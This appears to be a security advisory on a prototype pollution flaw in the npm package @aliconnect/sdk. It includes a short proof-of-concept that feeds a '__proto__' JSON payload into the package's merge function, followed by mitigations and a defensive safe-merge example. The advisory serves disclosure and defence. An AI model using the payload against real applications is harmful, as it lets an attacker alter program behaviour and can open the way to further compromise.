Affected versions of this package are vulnerable to Prototype Pollution via the sdk function due to a missing check for whether an attribute resolves to the object prototype.
To exploit this vulnerability, an attacker can pass a malicious object from user-controllable input to the aim function in aim.js. The input resolves to the object prototype and thus modifies the behaviour of the program.
var sdk = require("@aliconnect/sdk")
// JSON.parse creates an own property literally named "__proto__", which an unguarded merge copies onto Object.prototype
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
console.log('before prototype pollution: polluted:', {}.polluted) // undefined
sdk({}, BAD_JSON)
console.log('after prototype pollution: polluted:', {}.polluted) // true if the merge is unguarded
- Freeze the prototype: use Object.freeze(Object.prototype).
- Validate JSON inputs before merging them.
- Use Map instead of Object.
- Create objects without a prototype; this breaks the prototype chain and prevents pollution. Example:
let obj = Object.create(null); // no prototype, so there is no chain to pollute
obj.__proto__ // undefined
obj.constructor // undefined
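The missing check described above, shown on the defensive side: an added example (not the package's own code; the real sdk/aim merge is not on this page, so safeMerge is a hypothetical stand-in for that kind of deep merge) that refuses the keys through which pollution happens and reports them, run against the same payload shape as the PoC.

```javascript
// Keys that, when merged, write through to the prototype chain.
const UNSAFE_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function isPlainObject(value) {
  return value !== null && typeof value === "object" && !Array.isArray(value);
}

// Deep-merge `source` into `target`, skipping keys that would walk up the
// prototype chain. Refused keys are collected so the caller can log or
// reject the input instead of silently dropping them.
function safeMerge(target, source, refused = []) {
  for (const key of Object.keys(source)) {
    if (UNSAFE_KEYS.has(key)) {
      refused.push(key);
      continue;
    }
    const value = source[key];
    if (isPlainObject(value)) {
      // Only recurse into an own plain-object property of target; otherwise
      // start from a fresh object so we never write through an inherited one.
      const existing =
        Object.prototype.hasOwnProperty.call(target, key) && isPlainObject(target[key])
          ? target[key]
          : {};
      target[key] = safeMerge(existing, value, refused);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed input: the advisory's payload shape plus one benign key.
const BAD_JSON = JSON.parse('{"__proto__":{"polluted":true},"name":"ok"}');

// Returns what a caller would want to check: the merged result, the keys
// that were refused, and whether Object.prototype was touched.
function demo() {
  const refused = [];
  const result = safeMerge({}, BAD_JSON, refused);
  return { result, refused, globalPolluted: ({}).polluted };
}

console.log(JSON.stringify(demo()));
```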
https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b